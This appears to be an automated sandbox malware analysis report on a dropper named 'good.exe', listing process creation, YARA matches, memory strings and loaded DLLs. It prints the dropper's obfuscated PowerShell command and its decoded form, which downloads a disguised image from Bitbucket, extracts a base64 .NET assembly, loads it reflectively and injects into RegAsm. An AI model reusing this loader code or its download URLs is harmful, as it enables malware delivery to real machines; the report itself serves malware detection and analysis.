                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/13e6a3ab-36e2-
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                    Source: powershell.exe, 00000006.00000002.2324109491.000001E4805B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2373492647.000001E4F3E85000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1993675300.00000263A89B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1993297544.00000263A87C6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1993120651.00000263A8752000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AECC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1993120651.00000263A8740000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1993869124.00000263AA310000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AA511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                    Source: powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AECDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: fontdrvhost.exe, 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_5ab7c9fd-1
                    Source: fontdrvhost.exe, 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_dea959b2-a
                    Source: Yara matchFile source: 12.3.fontdrvhost.exe.5120000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.3.fontdrvhost.exe.5340000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.3.fontdrvhost.exe.5340000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 3384, type: MEMORYSTR

                    System Summary

                    barindex
                    Source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 8112, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@
B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@D
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF731912C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF731911C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF7319166C4
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF7319140C4
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF731916CA4
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF731912DB4
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF731911D28
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF731915D90
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF731911C0C
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF731913530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 676
Source: good.exe Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 5962 bytes, 1 file, at 0x2c +A "fwr.vbs", ID 712, number 1, 1 datablock, 0x1503 compression
Source: good.exe Binary or memory string: OriginalFilename vs good.exe
Source: good.exe, 00000000.00000000.1684038930.00007FF73191E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE D vs good.exe
Source: good.exe, 00000000.00000000.1684038930.00007FF73191E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs good.exe
Source: good.exe Binary or memory string: OriginalFilenameWEXTRACT.EXE D vs good.exe
Source: good.exe Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs good.exe
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5168
Source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8112, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, SimpleZip.cs Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, SimpleZip.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.263ad3ecf60.1.raw.unpack, SimpleZip.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.263aa440000.0.raw.unpack, SimpleZip.cs Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.powershell.exe.263aa440000.0.raw.unpack, SimpleZip.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.263aa440000.0.raw.unpack, SimpleZip.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@18/8@2/3
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF731916CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF7319166C4 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA
Source: C:\Users\user\Desktop\good.exe Code function: 0_2_00007FF731917AC8 FindResourceExA,LoadResource,DialogBoxIndirectParamA,FreeResource
Source: C:\Windows\SysWOW64\fontdrvhost.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-609f1fed-de85-1505dc-3df414f63d63}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Users\user\Desktop\good.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
Source: C:\Users\user\Desktop\good.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c fwr.vbs
Source: good.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\good.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Source: good.exe ReversingLabs: Detection: 18%
Source: good.exe Virustotal: Detection: 22%
Source: unknown Process created: C:\Users\user\Desktop\good.exe "C:\Users\user\Desktop\good.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Users\user\Desktop\good.exe Section loaded: cabinet.dll
Source: C:\Users\user\Desktop\good.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\good.exe Section loaded: feclient.dll
Source: C:\Users\user\Desktop\good.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\good.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\good.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\good.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\good.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\good.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\good.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\good.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\good.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\good.exe Section loaded: advpack.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
